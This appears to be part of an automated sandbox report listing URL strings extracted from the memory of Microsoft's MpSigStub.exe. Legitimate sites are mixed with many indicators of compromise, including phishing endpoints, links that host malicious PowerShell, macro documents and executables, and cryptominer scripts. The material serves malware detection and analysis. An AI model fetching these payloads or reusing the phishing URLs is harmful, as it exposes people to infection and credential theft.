Source: MpSigStub.exe, 00000023.00000003.18315106599.0000015B1B858000.00000004.00000001.sdmp String found in binary or memory: https://tomamate.si/
Source: MpSigStub.exe, 00000023.00000003.18298772777.0000015B1A8DA000.00000004.00000001.sdmp String found in binary or memory: https://toulousa.com/omg/rockspa.php
Source: MpSigStub.exe, 00000023.00000003.18306868118.0000015B1AA1D000.00000004.00000001.sdmp String found in binary or memory: https://towingnow.ca/LvR2HWHdQ.php
Source: MpSigStub.exe, 00000023.00000003.18318671001.0000015B1C4A2000.00000004.00000001.sdmp String found in binary or memory: https://tph786.com/gym/assets/css/
Source: MpSigStub.exe, 00000023.00000003.18345035369.0000015B1B176000.00000004.00000001.sdmp String found in binary or memory: https://tr.im/1azmq)
Source: MpSigStub.exe, 00000023.00000003.18329049691.0000015B1ABCB000.00000004.00000001.sdmp String found in binary or memory: https://track.fourtiz.com
Source: MpSigStub.exe, 00000023.00000003.18319967809.0000015B1BE5C000.00000004.00000001.sdmp String found in binary or memory: https://tradingdashboards.com/
Source: MpSigStub.exe, 00000023.00000003.18337818328.0000015B1BB10000.00000004.00000001.sdmp String found in binary or memory: https://trafffi.ru/123?utm_term=
Source: MpSigStub.exe, 00000023.00000003.18337818328.0000015B1BB10000.00000004.00000001.sdmp String found in binary or memory: https://trafffi.ru/aws?utm_term=
Source: MpSigStub.exe, 00000023.00000003.18289945062.0000015B1AE5F000.00000004.00000001.sdmp String found in binary or memory: https://trafffi.ru/shook?utm_term=
Source: MpSigStub.exe, 00000023.00000003.18289945062.0000015B1AE5F000.00000004.00000001.sdmp String found in binary or memory: https://trafffi.ru/strik?utm_term=
Source: MpSigStub.exe, 00000023.00000003.18289945062.0000015B1AE5F000.00000004.00000001.sdmp String found in binary or memory: https://traffking.ru/123?utm_term=
Source: MpSigStub.exe, 00000023.00000003.18289945062.0000015B1AE5F000.00000004.00000001.sdmp String found in binary or memory: https://traffking.ru/aws?utm_term=
Source: MpSigStub.exe, 00000023.00000003.18316647369.0000015B1B557000.00000004.00000001.sdmp String found in binary or memory: https://traffking.ru/shook?utm_term=
Source: MpSigStub.exe, 00000023.00000003.18316647369.0000015B1B557000.00000004.00000001.sdmp String found in binary or memory: https://traffking.ru/strik?utm_term=
Source: MpSigStub.exe, 00000023.00000003.18335134155.0000015B1A914000.00000004.00000001.sdmp String found in binary or memory: https://transfer.sh/
Source: MpSigStub.exe, 00000023.00000003.18423368163.0000015B1C1B6000.00000004.00000001.sdmp String found in binary or memory: https://transfer.sh/yyaum/svchost.sh
Source: MpSigStub.exe, 00000023.00000003.18289945062.0000015B1AE5F000.00000004.00000001.sdmp String found in binary or memory: https://trex-miner.com
Source: MpSigStub.exe, 00000023.00000003.18424133495.0000015B1C0F0000.00000004.00000001.sdmp String found in binary or memory: https://tubestore.com.br/wp-content/p_bn/
Source: MpSigStub.exe, 00000023.00000003.18337818328.0000015B1BB10000.00000004.00000001.sdmp String found in binary or memory: https://tweetperks.com/lbim8w/
Source: MpSigStub.exe, 00000023.00000003.18426595439.0000015B1BB86000.00000004.00000001.sdmp String found in binary or memory: https://twitter.com/eduClient
Source: MpSigStub.exe, 00000023.00000003.18423368163.0000015B1C1B6000.00000004.00000001.sdmp String found in binary or memory: https://u.lewd.se/
Source: MpSigStub.exe, 00000023.00000003.18310002934.0000015B1B40D000.00000004.00000001.sdmp String found in binary or memory: https://u.nu/920yx
Source: MpSigStub.exe, 00000023.00000003.18310002934.0000015B1B40D000.00000004.00000001.sdmp String found in binary or memory: https://u.nu/e6b2i
Source: MpSigStub.exe, 00000023.00000003.18430467796.0000015B1AE1C000.00000004.00000001.sdmp String found in binary or memory: https://u.nu/edc63
Source: MpSigStub.exe, 00000023.00000003.18427547415.0000015B1B8F2000.00000004.00000001.sdmp String found in binary or memory: https://u6882561.ct.sendgrid.net/wf/click?upn=o3yy7nxymwp5cpvqnxo3xb8sbgrdkj8vj
Source: MpSigStub.exe, 00000023.00000003.18432136853.0000015B1BFE7000.00000004.00000001.sdmp String found in binary or memory: https://u6947877.ct.sendgrid.net/wf/click?upn=aum5tbbw0s-2boddc9wvl76ffmwkftnihk7jwmiyskchpxyq1lorjb
Source: MpSigStub.exe, 00000023.00000003.18430467796.0000015B1AE1C000.00000004.00000001.sdmp String found in binary or memory: https://uaeub.com/ds/161120.gif
Source: MpSigStub.exe, 00000023.00000003.18423819335.0000015B1B1FA000.00000004.00000001.sdmp String found in binary or memory: https://ufile.io/xjsrzal2
Source: MpSigStub.exe, 00000023.00000003.18425885690.0000015B1BCD0000.00000004.00000001.sdmp String found in binary or memory: https://uis.public360online.com:443/biz/v2-pbr/docprod/templates/_uis%20moteinnkalling_referat.docx
Source: MpSigStub.exe, 00000023.00000003.18434111043.0000015B1AF23000.00000004.00000001.sdmp String found in binary or memory: https://ulvis.net/ujt
Source: MpSigStub.exe, 00000023.00000003.18291256000.0000015B1B9B9000.00000004.00000001.sdmp String found in binary or memory: https://unitedstates1.cp.wd.microsoft.us/WdCpSrvc.asmx
Source: MpSigStub.exe, 00000023.00000003.18291256000.0000015B1B9B9000.00000004.00000001.sdmp String found in binary or memory: https://unitedstates1.cp.wd.microsoft.us/wdcp.svc/bond/submitReport
Source: MpSigStub.exe, 00000023.00000003.18291256000.0000015B1B9B9000.00000004.00000001.sdmp String found in binary or memory: https://unitedstates1.cp.wd.microsoft.us/wdcp.svc/submitReport
Source: MpSigStub.exe, 00000023.00000003.18291256000.0000015B1B9B9000.00000004.00000001.sdmp String found in binary or memory: https://unitedstates2.cp.wd.microsoft.us/WdCpSrvc.asmx
Source: MpSigStub.exe, 00000023.00000003.18291256000.0000015B1B9B9000.00000004.00000001.sdmp String found in binary or memory: https://unitedstates2.cp.wd.microsoft.us/wdcp.svc/bond/submitReport
Source: MpSigStub.exe, 00000023.00000003.18291256000.0000015B1B9B9000.00000004.00000001.sdmp String found in binary or memory: https://unitedstates2.cp.wd.microsoft.us/wdcp.svc/submitReport
Source: MpSigStub.exe, 00000023.00000003.18291256000.0000015B1B9B9000.00000004.00000001.sdmp String found in binary or memory: https://unitedstates4.cp.wd.microsoft.us/WdCpSrvc.asmx
Source: MpSigStub.exe, 00000023.00000003.18291256000.0000015B1B9B9000.00000004.00000001.sdmp String found in binary or memory: https://unitedstates4.cp.wd.microsoft.us/wdcp.svc/bond/submitReport
Source: MpSigStub.exe, 00000023.00000003.18291256000.0000015B1B9B9000.00000004.00000001.sdmp String found in binary or memory: https://unitedstates4.cp.wd.microsoft.us/wdcp.svc/submitReport
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp String found in binary or memory: https://updatesdomainn.ml/
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp String found in binary or memory: https://updatesdomainn.ml/post.php
Source: MpSigStub.exe, 00000023.00000003.18316647369.0000015B1B557000.00000004.00000001.sdmp String found in binary or memory: https://upload.cat/
Source: MpSigStub.exe, 00000023.00000003.18319632958.0000015B1BDD9000.00000004.00000001.sdmp String found in binary or memory: https://upload.wikimedia.org/wikipedia/commons/
Source: MpSigStub.exe, 00000023.00000003.18429220503.0000015B1A3C2000.00000004.00000001.sdmp String found in binary or memory: https://uploadvirus.com/uploads/
Source: MpSigStub.exe, 00000023.00000003.18316647369.0000015B1B557000.00000004.00000001.sdmp String found in binary or memory: https://upt.fastsearch.me/
Source: MpSigStub.exe, 00000023.00000003.18349004213.0000015B1A9DB000.00000004.00000001.sdmp String found in binary or memory: https://upurl.me/m7oiv
Source: MpSigStub.exe, 00000023.00000003.18428865493.0000015B1A381000.00000004.00000001.sdmp String found in binary or memory: https://upurl.me/vvkzd
Source: MpSigStub.exe, 00000023.00000003.18315106599.0000015B1B858000.00000004.00000001.sdmp String found in binary or memory: https://urbanhomefitness.com/file/excelzz/index.php?email=
Source: MpSigStub.exe, 00000023.00000003.18432805737.0000015B1BA3B000.00000004.00000001.sdmp String found in binary or memory: https://uringvermi.at/3/zet.dll
Source: MpSigStub.exe, 00000023.00000003.18322924550.0000015B1B0F3000.00000004.00000001.sdmp String found in binary or memory: https://utilities.pcpitstop.com
Source: MpSigStub.exe, 00000023.00000003.18335432095.0000015B1A956000.00000004.00000001.sdmp String found in binary or memory: https://vaqww.dyndns.dk/tolly5/
Source: MpSigStub.exe, 00000023.00000003.18344475813.0000015B1C1D6000.00000004.00000001.sdmp String found in binary or memory: https://vaqww.dyndns.dk/tolly5/next.php
Source: MpSigStub.exe, 00000023.00000003.18432136853.0000015B1BFE7000.00000004.00000001.sdmp String found in binary or memory: https://victoriaparkmazda-my.sharepoint.com/personal/ann_victoriaparkmazda_co_uk/_layouts/15/guestac
Source: MpSigStub.exe, 00000023.00000003.18320270470.0000015B1B515000.00000004.00000001.sdmp String found in binary or memory: https://vieeewen.org/ddy/next.php
Source: MpSigStub.exe, 00000023.00000003.18320270470.0000015B1B515000.00000004.00000001.sdmp String found in binary or memory: https://vieeewen.org/tgg/next.php
Source: MpSigStub.exe, 00000023.00000003.18424989390.0000015B1C5AA000.00000004.00000001.sdmp String found in binary or memory: https://viro.mleydier.fr/noauth
Source: MpSigStub.exe, 00000023.00000003.18285687047.0000015B1B29A000.00000004.00000001.sdmp String found in binary or memory: https://vm.jt-voicem.club/?e=ckoonce
Source: MpSigStub.exe, 00000023.00000003.18285687047.0000015B1B29A000.00000004.00000001.sdmp String found in binary or memory: https://vm.jt-voicem.club/?e=ljeffcoat
Source: MpSigStub.exe, 00000023.00000003.18402123411.0000015B1B2B1000.00000004.00000001.sdmp String found in binary or memory: https://vmnames.ssvoipsx.xyz/?e=%25
Source: MpSigStub.exe, 00000023.00000003.18340752801.0000015B1B72C000.00000004.00000001.sdmp String found in binary or memory: https://vmnapi.net/vmap/1.0/yhs/ms/yhs/?vmimp=
Source: MpSigStub.exe, 00000023.00000003.18428156417.0000015B1C02A000.00000004.00000001.sdmp String found in binary or memory: https://vn.pr-nijim.xyz/?e=soumu
Source: MpSigStub.exe, 00000023.00000003.18285687047.0000015B1B29A000.00000004.00000001.sdmp String found in binary or memory: https://voice.vm-business.online/?e=jscott
Source: MpSigStub.exe, 00000023.00000003.18336414128.0000015B1BF22000.00000004.00000001.sdmp String found in binary or memory: https://voicemailss.hozoimn.xyz/?e=twfyawx5bi5kywvja2vslw1peebnyxjhdghvbkvszwn0cmljlmnvbq==
Source: MpSigStub.exe, 00000023.00000003.18299634028.0000015B1AF1A000.00000004.00000001.sdmp String found in binary or memory: https://voipses.eononass.xyz/?e=%25
Source: MpSigStub.exe, 00000023.00000003.18299634028.0000015B1AF1A000.00000004.00000001.sdmp String found in binary or memory: https://voipss.snonames.xyz/?e=%25
Source: MpSigStub.exe, 00000023.00000003.18346827221.0000015B1B1B9000.00000004.00000001.sdmp String found in binary or memory: https://vooydvclhlqukhdvrsxe.com/tx.dll
Source: MpSigStub.exe, 00000023.00000003.18431115827.0000015B1AFEA000.00000004.00000001.sdmp String found in binary or memory: https://voyya.com.mx/wp-content/themes/Divi/incl(
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp String found in binary or memory: https://vr2oq.csb.app/
Source: MpSigStub.exe, 00000023.00000003.18324547737.0000015B1B0B1000.00000004.00000001.sdmp String found in binary or memory: https://vsit.site/
Source: MpSigStub.exe, 00000023.00000003.18332554033.0000015B1C0AF000.00000004.00000001.sdmp String found in binary or memory: https://vsit.site/4a8gk
Source: MpSigStub.exe, 00000023.00000003.18332554033.0000015B1C0AF000.00000004.00000001.sdmp String found in binary or memory: https://vsit.site/ghqec
Source: MpSigStub.exe, 00000023.00000003.18332554033.0000015B1C0AF000.00000004.00000001.sdmp String found in binary or memory: https://vsit.site/xndcx
Source: MpSigStub.exe, 00000023.00000003.18313512818.0000015B1B346000.00000004.00000001.sdmp String found in binary or memory: https://vtsamples.commondatastorage.googleapis.com/
Source: MpSigStub.exe, 00000023.00000003.18341814408.0000015B1C2D4000.00000004.00000001.sdmp String found in binary or memory: https://wac.edgecastcdn.net/800952/5b595c13-aea5-4a6c-a099-d29c4678f6f2-api/gcbs
Source: MpSigStub.exe, 00000023.00000003.18341814408.0000015B1C2D4000.00000004.00000001.sdmp String found in binary or memory: https://wac.edgecastcdn.net/800952/5b595c13-aea5-4a6c-a099-d29c4678f6f2-api/gccs
Source: MpSigStub.exe, 00000023.00000003.18428156417.0000015B1C02A000.00000004.00000001.sdmp String found in binary or memory: https://wacochamber.com/
Source: MpSigStub.exe, 00000023.00000003.18342870635.0000015B1AB89000.00000004.00000001.sdmp String found in binary or memory: https://we.tl/t-ccUfUrQOhF
Source: MpSigStub.exe, 00000023.00000003.18343611807.0000015B1BD13000.00000004.00000001.sdmp String found in binary or memory: https://web.certicamara.com/marco-legal0Z
Source: MpSigStub.exe, 00000023.00000003.18319632958.0000015B1BDD9000.00000004.00000001.sdmp String found in binary or memory: https://webmailx.space/ml/ama/4/excel/log.php
Source: MpSigStub.exe, 00000023.00000003.18345359888.0000015B1A789000.00000004.00000001.sdmp String found in binary or memory: https://world-wwt.com/wp-admin/css/colors/coffee/reportexcelnew.php
Source: MpSigStub.exe, 00000023.00000003.18430797596.0000015B1AE5D000.00000004.00000001.sdmp String found in binary or memory: https://ws.onehub.com/files/7w1372el
Source: MpSigStub.exe, 00000023.00000003.18329979252.0000015B1AE1C000.00000004.00000001.sdmp String found in binary or memory: https://www-cdn.getwebcake.com/
Source: MpSigStub.exe, 00000023.00000003.18426595439.0000015B1BB86000.00000004.00000001.sdmp String found in binary or memory: https://www.4shared.com/download/pJhaizQgba/wd11.exe
Source: MpSigStub.exe, 00000023.00000003.18429220503.0000015B1A3C2000.00000004.00000001.sdmp String found in binary or memory: https://www.4shared.com/web/directdownload/plcok719ce/hhnjnm.d9cc6b8210cf7f938818851
Source: MpSigStub.exe, 00000023.00000003.18428156417.0000015B1C02A000.00000004.00000001.sdmp String found in binary or memory: https://www.admos-gleitlager.de/feed/
Source: MpSigStub.exe, 00000023.00000003.18428156417.0000015B1C02A000.00000004.00000001.sdmp String found in binary or memory: https://www.advokathuset.dk/auktioner/tvangsauktioner/saadan-koeber-du-paa-tvangsauktion
Source: MpSigStub.exe, 00000023.00000003.18331238413.0000015B1AAC2000.00000004.00000001.sdmp String found in binary or memory: https://www.aec.com.my/aec_5.5/public/ph/h/page.php
Source: MpSigStub.exe, 00000023.00000003.18428156417.0000015B1C02A000.00000004.00000001.sdmp String found in binary or memory: https://www.anca-aste.it/uploads/form/boeing_spe_leos_logo.jpg
Source: MpSigStub.exe, 00000023.00000003.18335432095.0000015B1A956000.00000004.00000001.sdmp String found in binary or memory: https://www.anf.es/AC/ACTAS/789230
Source: MpSigStub.exe, 00000023.00000003.18335432095.0000015B1A956000.00000004.00000001.sdmp String found in binary or memory: https://www.anf.es/AC/ANFServerCA.crl0
Source: MpSigStub.exe, 00000023.00000003.18335432095.0000015B1A956000.00000004.00000001.sdmp String found in binary or memory: https://www.anf.es/address/)1(0&
Source: MpSigStub.exe, 00000023.00000003.18340752801.0000015B1B72C000.00000004.00000001.sdmp String found in binary or memory: https://www.anthonyshandyman.com/irn/toolzlord.php
Source: MpSigStub.exe, 00000023.00000003.18245056044.0000015B0B6EB000.00000004.00000001.sdmp String found in binary or memory: https://www.apple.com/appleca/0
Source: MpSigStub.exe, 00000023.00000003.18429220503.0000015B1A3C2000.00000004.00000001.sdmp String found in binary or memory: https://www.astedams.it/uploads/frame/61.dotm
Source: MpSigStub.exe, 00000023.00000003.18429220503.0000015B1A3C2000.00000004.00000001.sdmp String found in binary or memory: https://www.astedams.it/uploads/template/17.dotm
Source: MpSigStub.exe, 00000023.00000003.18428156417.0000015B1C02A000.00000004.00000001.sdmp String found in binary or memory: https://www.augenta.com/site/xmlrpc.php
Source: MpSigStub.exe, 00000023.00000003.18428156417.0000015B1C02A000.00000004.00000001.sdmp String found in binary or memory: https://www.autopfand24.de/pfandhaus-in-meiner-naehe/
Source: MpSigStub.exe, 00000023.00000003.18432136853.0000015B1BFE7000.00000004.00000001.sdmp String found in binary or memory: https://www.bancanetempresarial.banamex
Source: MpSigStub.exe, 00000023.00000003.18299696915.0000015B1AF24000.00000004.00000001.sdmp, MpSigStub.exe, 00000023.00000003.18424133495.0000015B1C0F0000.00000004.00000001.sdmp String found in binary or memory: https://www.bitly.com/
Source: MpSigStub.exe, 00000023.00000003.18425422653.0000015B1C5EB000.00000004.00000001.sdmp String found in binary or memory: https://www.bitly.com/ad
Source: MpSigStub.exe, 00000023.00000003.18429220503.0000015B1A3C2000.00000004.00000001.sdmp String found in binary or memory: https://www.bitly.com/bug41
Source: MpSigStub.exe, 00000023.00000003.18327176542.0000015B1B61C000.00000004.00000001.sdmp String found in binary or memory: https://www.bizsonet.com/wp-admin/js/jquery
Source: MpSigStub.exe, 00000023.00000003.18428156417.0000015B1C02A000.00000004.00000001.sdmp String found in binary or memory: https://www.botanicinnovations.com/wp-admin/admin-ajax.php
Source: MpSigStub.exe, 00000023.00000003.18428156417.0000015B1C02A000.00000004.00000001.sdmp String found in binary or memory: https://www.brawnmediany.com
Source: MpSigStub.exe, 00000023.00000003.18428156417.0000015B1C02A000.00000004.00000001.sdmp String found in binary or memory: https://www.cactusthebrand.com/xmlrpc.php
Source: MpSigStub.exe, 00000023.00000003.18425422653.0000015B1C5EB000.00000004.00000001.sdmp String found in binary or memory: https://www.cipnet.cl/wp-content/godd/godaddy-rd18/next.php
Source: MpSigStub.exe, 00000023.00000003.18428156417.0000015B1C02A000.00000004.00000001.sdmp String found in binary or memory: https://www.coastalbridgeadvisors.com
Source: MpSigStub.exe, 00000023.00000003.18326614272.0000015B1A717000.00000004.00000001.sdmp String found in binary or memory: https://www.cogmobile.com/next1.php
Source: MpSigStub.exe, 00000023.00000003.18340752801.0000015B1B72C000.00000004.00000001.sdmp String found in binary or memory: https://www.coinblind.com/lib/coinblind_beta.js
Source: MpSigStub.exe, 00000023.00000003.18428156417.0000015B1C02A000.00000004.00000001.sdmp String found in binary or memory: https://www.creamery201.com/
Source: MpSigStub.exe, 00000023.00000003.18286537046.0000015B1A3C2000.00000004.00000001.sdmp String found in binary or memory: https://www.dfib.net/calc.exe
Source: MpSigStub.exe, 00000023.00000003.18350085117.0000015B1B6E3000.00000004.00000001.sdmp String found in binary or memory: https://www.digicert.com/CPS0
Source: MpSigStub.exe, 00000023.00000003.18310002934.0000015B1B40D000.00000004.00000001.sdmp String found in binary or memory: https://www.doganturan.av.tr/wp-admin/alu/reportdhlnew2.php
Source: MpSigStub.exe, 00000023.00000003.18323230598.0000015B1B134000.00000004.00000001.sdmp String found in binary or memory: https://www.doganturan.av.tr/wp-admin/bigi/reportdhlnew2.php
Source: MpSigStub.exe, 00000023.00000003.18340752801.0000015B1B72C000.00000004.00000001.sdmp, MpSigStub.exe, 00000023.00000003.18322610510.0000015B1A546000.00000004.00000001.sdmp String found in binary or memory: https://www.dropbox.com/
Source: MpSigStub.exe, 00000023.00000003.18432465628.0000015B1B9FA000.00000004.00000001.sdmp String found in binary or memory: https://www.dropbox.com/s/
Source: MpSigStub.exe, 00000023.00000003.18327176542.0000015B1B61C000.00000004.00000001.sdmp String found in binary or memory: https://www.dropbox.com/s/41zf98knyy5atko/001_01.ps1?dl
Source: MpSigStub.exe, 00000023.00000003.18327176542.0000015B1B61C000.00000004.00000001.sdmp String found in binary or memory: https://www.dropbox.com/s/dh8flnrogfq1h1w/001.ps1?dl
Source: MpSigStub.exe, 00000023.00000003.18429220503.0000015B1A3C2000.00000004.00000001.sdmp String found in binary or memory: https://www.dropbox.com/s/dmprbq9mxwylpht/zs437zfig68f.doc?dl=1
Source: MpSigStub.exe, 00000023.00000003.18423368163.0000015B1C1B6000.00000004.00000001.sdmp String found in binary or memory: https://www.dropbox.com/s/foughx315flj51u/worddata.dotm?dl=1
Source: MpSigStub.exe, 00000023.00000003.18345359888.0000015B1A789000.00000004.00000001.sdmp String found in binary or memory: https://www.dropbox.com/s/jxfyg8a6oj13z7i/factuur%20006643-89845.zip
Source: MpSigStub.exe, 00000023.00000003.18428156417.0000015B1C02A000.00000004.00000001.sdmp String found in binary or memory: https://www.dropbox.com/s/r9xrl3meju6lr19/payment_advice.uue?dl=1)
Source: MpSigStub.exe, 00000023.00000003.18298772777.0000015B1A8DA000.00000004.00000001.sdmp String found in binary or memory: https://www.e-gold.com
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp String found in binary or memory: https://www.e-gold.com/
Source: MpSigStub.exe, 00000023.00000003.18326614272.0000015B1A717000.00000004.00000001.sdmp String found in binary or memory: https://www.e-gold.com/acct/
Source: MpSigStub.exe, 00000023.00000003.18298772777.0000015B1A8DA000.00000004.00000001.sdmp String found in binary or memory: https://www.e-gold.com/acct/accountinfo.asp
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp String found in binary or memory: https://www.e-gold.com/acct/ai.asp?c=AS
Source: MpSigStub.exe, 00000023.00000003.18298772777.0000015B1A8DA000.00000004.00000001.sdmp String found in binary or memory: https://www.e-gold.com/acct/verify.asp
Source: MpSigStub.exe, 00000023.00000003.18298772777.0000015B1A8DA000.00000004.00000001.sdmp String found in binary or memory: https://www.e-gold.com/acct/verify.asp&BAction=
Source: MpSigStub.exe, 00000023.00000003.18345359888.0000015B1A789000.00000004.00000001.sdmp String found in binary or memory: https://www.econoticias.com.bo/aa/excel.php
Source: MpSigStub.exe, 00000023.00000003.18345359888.0000015B1A789000.00000004.00000001.sdmp String found in binary or memory: https://www.econoticias.com.bo/bb/excel.php
Source: MpSigStub.exe, 00000023.00000003.18345359888.0000015B1A789000.00000004.00000001.sdmp String found in binary or memory: https://www.econoticias.com.bo/cc/excel.php
Source: MpSigStub.exe, 00000023.00000003.18350843348.0000015B1B3CA000.00000004.00000001.sdmp String found in binary or memory: https://www.elcom.admin.ch
Source: MpSigStub.exe, 00000023.00000003.18402123411.0000015B1B2B1000.00000004.00000001.sdmp String found in binary or memory: https://www.emergencydentistlondonpro.co.uk/hddu2vgb7muait.php
Source: MpSigStub.exe, 00000023.00000003.18428156417.0000015B1C02A000.00000004.00000001.sdmp String found in binary or memory: https://www.escrowprotects.com/share
Source: MpSigStub.exe, 00000023.00000003.18290902842.0000015B1BFA6000.00000004.00000001.sdmp String found in binary or memory: https://www.exploit-db.com/exploits/39719/
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp String found in binary or memory: https://www.fabianiarte.com/uploads/imgup/
Source: MpSigStub.exe, 00000023.00000003.18335134155.0000015B1A914000.00000004.00000001.sdmp, MpSigStub.exe, 00000023.00000003.18339677269.0000015B1AB04000.00000004.00000001.sdmp String found in binary or memory: https://www.fastsupport.com
Source: MpSigStub.exe, 00000023.00000003.18428517155.0000015B1C06B000.00000004.00000001.sdmp String found in binary or memory: https://www.fastsupport.com/
Source: MpSigStub.exe, 00000023.00000003.18296359788.0000015B1C251000.00000004.00000001.sdmp String found in binary or memory: https://www.finance-portal.basf.net/portal
Source: MpSigStub.exe, 00000023.00000003.18427841372.0000015B1B933000.00000004.00000001.sdmp String found in binary or memory: https://www.flexdirect.adp.com/client/login.aspx
Source: MpSigStub.exe, 00000023.00000003.18281872533.0000015B1C527000.00000004.00000001.sdmp String found in binary or memory: https://www.formtools.com/f/micr0soft0ffice365mail
Source: MpSigStub.exe, 00000023.00000003.18428156417.0000015B1C02A000.00000004.00000001.sdmp String found in binary or memory: https://www.fotoideaymedia.es/wp-content/themes/fotoideaymedia2017/css/reset.css
Source: MpSigStub.exe, 00000023.00000003.18320914162.0000015B1B65F000.00000004.00000001.sdmp String found in binary or memory: https://www.freecontent.bid./cpcu.js
Source: MpSigStub.exe, 00000023.00000003.18297885321.0000015B1B490000.00000004.00000001.sdmp String found in binary or memory: https://www.google-analytics.com/j/collect.
Source: MpSigStub.exe, 00000023.00000003.18320914162.0000015B1B65F000.00000004.00000001.sdmp String found in binary or memory: https://www.google.com
Source: MpSigStub.exe, 00000023.00000003.18424566697.0000015B1C41E000.00000004.00000001.sdmp String found in binary or memory: https://www.google.com.tr/
Source: MpSigStub.exe, 00000023.00000003.18424566697.0000015B1C41E000.00000004.00000001.sdmp String found in binary or memory: https://www.google.com/
Source: MpSigStub.exe, 00000023.00000003.18305659214.0000015B1C39B000.00000004.00000001.sdmp String found in binary or memory: https://www.google.com/accounts/servicelogin
Source: MpSigStub.exe, 00000023.00000003.18315964598.0000015B1A481000.00000004.00000001.sdmp String found in binary or memory: https://www.gottalife.net/wp-content/plugins/seo_index/evt8tkbsidbqf.php
Source: MpSigStub.exe, 00000023.00000003.18402123411.0000015B1B2B1000.00000004.00000001.sdmp String found in binary or memory: https://www.gqtoronto.com/live/excelzz/index.php?email=
Source: MpSigStub.exe, 00000023.00000003.18431115827.0000015B1AFEA000.00000004.00000001.sdmp String found in binary or memory: https://www.gynfit2019.com.br/fotos.jpg
Source: MpSigStub.exe, 00000023.00000003.18320914162.0000015B1B65F000.00000004.00000001.sdmp String found in binary or memory: https://www.hashing.win/scripts/min.js
Source: MpSigStub.exe, 00000023.00000003.18327176542.0000015B1B61C000.00000004.00000001.sdmp String found in binary or memory: https://www.hashing.win/t5s0.js
Source: MpSigStub.exe, 00000023.00000003.18432136853.0000015B1BFE7000.00000004.00000001.sdmp String found in binary or memory: https://www.horizon-sun.com/po/mailbox/rectify/sys-admin-9-0-4-7/repair-00-4/1159.php
Source: MpSigStub.exe, 00000023.00000003.18426889733.0000015B1BBC7000.00000004.00000001.sdmp String found in binary or memory: https://www.icq.com/people/
Source: MpSigStub.exe, 00000023.00000003.18326506118.0000015B1A705000.00000004.00000001.sdmp String found in binary or memory: https://www.ijsiodjfo.ml/index.php?user=
Source: MpSigStub.exe, 00000023.00000003.18345359888.0000015B1A789000.00000004.00000001.sdmp String found in binary or memory: https://www.ijtra.com/pear/docs/structures_graph/docs/html/media/tito/po.htm
Source: MpSigStub.exe, 00000023.00000003.18432465628.0000015B1B9FA000.00000004.00000001.sdmp String found in binary or memory: https://www.instagram.com/
Source: MpSigStub.exe, 00000023.00000003.18342870635.0000015B1AB89000.00000004.00000001.sdmp String found in binary or memory: https://www.kbtseafood.com/wp-content/uploads/2019/07/JTGUJRDPX.res
Source: MpSigStub.exe, 00000023.00000003.18432136853.0000015B1BFE7000.00000004.00000001.sdmp String found in binary or memory: https://www.listrikindo.com/templates/vinye/wp-content/themes/jamo/order1.doc
Source: MpSigStub.exe, 00000023.00000003.18324547737.0000015B1B0B1000.00000004.00000001.sdmp String found in binary or memory: https://www.maan2u.com/alls.txt
Source: MpSigStub.exe, 00000023.00000003.18319632958.0000015B1BDD9000.00000004.00000001.sdmp String found in binary or memory: https://www.managuytakayama.com/purchases
Source: MpSigStub.exe, 00000023.00000003.18432465628.0000015B1B9FA000.00000004.00000001.sdmp String found in binary or memory: https://www.marriott.com
Source: MpSigStub.exe, 00000023.00000003.18307169245.0000015B1A4C3000.00000004.00000001.sdmp String found in binary or memory: https://www.miracleworkstudios.com/wp-content/uploads/2019/12/app/
Source: MpSigStub.exe, 00000023.00000003.18430467796.0000015B1AE1C000.00000004.00000001.sdmp String found in binary or memory: https://www.monconcept-renovation.fr/wp-admin/network/msci.exe
Source: MpSigStub.exe, 00000023.00000003.18402123411.0000015B1B2B1000.00000004.00000001.sdmp String found in binary or memory: https://www.moverandpackermvp.com/hindustan/scan/
Source: MpSigStub.exe, 00000023.00000003.18428156417.0000015B1C02A000.00000004.00000001.sdmp String found in binary or memory: https://www.nachhilfe-unterricht.com/wp-content/cache/autoptimize/css/autoptimize_018281502668e27604
Source: MpSigStub.exe, 00000023.00000003.18425885690.0000015B1BCD0000.00000004.00000001.sdmp String found in binary or memory: https://www.ne-ba.org/files/gallery/images/bae_ecs_epm.jpg
Source: MpSigStub.exe, 00000023.00000003.18432136853.0000015B1BFE7000.00000004.00000001.sdmp String found in binary or memory: https://www.nextrecruitment.ro//pdd/sfexpress/index.php?email=hiroyuki.ume.zh
Source: MpSigStub.exe, 00000023.00000003.18433793263.0000015B1AEE2000.00000004.00000001.sdmp String found in binary or memory: https://www.notamuzikaletleri.com/19.gif
Source: MpSigStub.exe, 00000023.00000003.18430078945.0000015B1C0AE000.00000004.00000001.sdmp String found in binary or memory: https://www.notion.so/ce3baa2cd5ec4f4eab00575f5ae423e8
Source: MpSigStub.exe, 00000023.00000003.18423368163.0000015B1C1B6000.00000004.00000001.sdmp String found in binary or memory: https://www.oratoriostsurukyo.com.br/arquivos/teste.hta
Source: MpSigStub.exe, 00000023.00000003.18424989390.0000015B1C5AA000.00000004.00000001.sdmp String found in binary or memory: https://www.palmtipsheet.com/wp-content/calc1.exe
Source: MpSigStub.exe, 00000023.00000003.18429220503.0000015B1A3C2000.00000004.00000001.sdmp String found in binary or memory: https://www.pamelamann.co.za/1/shola/doc/purchase.doc
Source: MpSigStub.exe, 00000023.00000003.18432465628.0000015B1B9FA000.00000004.00000001.sdmp String found in binary or memory: https://www.paypal.com
Source: MpSigStub.exe, 00000023.00000003.18318671001.0000015B1C4A2000.00000004.00000001.sdmp String found in binary or memory: https://www.piriform.com/inapp/installerofferpage
Source: MpSigStub.exe, 00000023.00000003.18428156417.0000015B1C02A000.00000004.00000001.sdmp String found in binary or memory: https://www.pmc-services.de
Source: MpSigStub.exe, 00000023.00000003.18283593829.0000015B1A80D000.00000004.00000001.sdmp String found in binary or memory: https://www.protectalaskasfuture.com/wp-content/upgrade/new.php
Source: MpSigStub.exe, 00000023.00000003.18319967809.0000015B1BE5C000.00000004.00000001.sdmp String found in binary or memory: https://www.realvnc.com
